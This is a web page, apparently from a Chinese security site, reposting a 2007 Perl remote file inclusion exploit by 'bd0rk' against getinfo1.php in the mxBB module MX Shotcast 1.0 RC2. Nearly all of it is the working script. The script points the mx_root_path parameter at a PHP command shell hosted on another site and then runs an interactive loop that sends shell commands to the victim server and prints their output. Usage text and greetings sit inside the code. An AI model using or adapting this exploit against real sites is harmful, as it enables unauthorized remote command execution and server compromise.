| 
 mxBB Module MX Shotcast 1.0 RC2 (getinfo1.php) RFI Exploit 
				  | 
 
 
|  
来源:www.soh-crew.it.tt 作者:bd0rk 发布时间:2007-04-13 
   | 
 
 
 
 | 
	 #!/usr/bin/perl # #mxBB Module MX Shotcast 1.0 RC2 (getinfo1.php) Remote File Include Exploit #  #Coded by bd0rk || SOH-Crew # #Usage: exploit.pl [target] [cmd shell] [shell variable] # #Greetings: str0ke, TheJT, DarkFig # #Vulnerable Code: include_once($mx_root_path . 'common.'.$phpEx); # #Vendor: http://www.mx-system.com/modules/mx_pafiledb/dload.php?action=download&file_id=342
  use LWP::UserAgent;
  $Path = $ARGV[0]; $Pathtocmd = $ARGV[1]; $cmdv = $ARGV[2];
  if($Path!~/http:\/\// || $Pathtocmd!~/http:\/\// || !$cmdv){usage()}
  head();
  while() {        print "[shell] \$"; while(<STDIN>)        {                $cmd=$_;                chomp($cmd);
  $xpl = LWP::UserAgent->new() or die; $req = HTTP::Request->new(GET =>$Path.'getinfo1.php?mx_root_path='.$Pathtocmd.'?&'.$cmdv.'='.$cmd)or die "\nCould Not connect\n";
  $res = $xpl->request($req); $return = $res->content; $return =~ tr/[\n]/[....]/;
  if (!$cmd) {print "\nPlease Enter a Command\n\n"; $return ="";}
  elsif ($return =~/failed to open stream: HTTP request failed!/ || $return =~/: Cannot execute a blank command in <b>/)        {print "\nCould Not Connect to cmd Host or Invalid Command Variable\n";exit} elsif ($return =~/^<br.\/>.<b>Fatal.error/) {print "\nInvalid Command or No Return\n\n"}
  if($return =~ /(.*)/)
 
  {        $finreturn = $1;        $finreturn=~ tr/[....]/[\n]/;        print "\r\n$finreturn\n\r";        last; }
  else {print "[shell] \$";}}}last;
  sub head()  {  print "\n============================================================================\r\n";  print " *mxBB Module MX Shotcast 1.0 RC2 (getinfo1.php) Remote File Include Exploit*\r\n";  print "============================================================================\r\n";  } sub usage()  {  head();  print " Usage: exploit.pl [target] [cmd shell location] [cmd shell variable]\r\n\n";  print " <Site> - Full path to MXShotcast ex: http://www.site.com/ \r\n";  print " <cmd shell> - Path to cmd Shell e.g http://www.different-site.com/cmd.txt \r\n";  print " <cmd variable> - Command variable used in php shell \r\n";  print "============================================================================\r\n";  print "                           Bug Found by bd0rk \r\n";  print "                           www.soh-crew.it.tt \r\n";  print "============================================================================\r\n";  exit();  }
  
	
  | 
 
 
|   | 
 
  | 
 
 
 
[ 推荐] 
[ 评论(0条)] 
[返回顶部] [打印本页] 
[关闭窗口]    | 
 
 
|  
 | 
 
 
|   | 
 
  | 
 
  
 | 
 
        
  | 
  | 
推荐广告 | 
 
  | 
 
  | 
 
| 
	
		
		
 | 
 
 
 |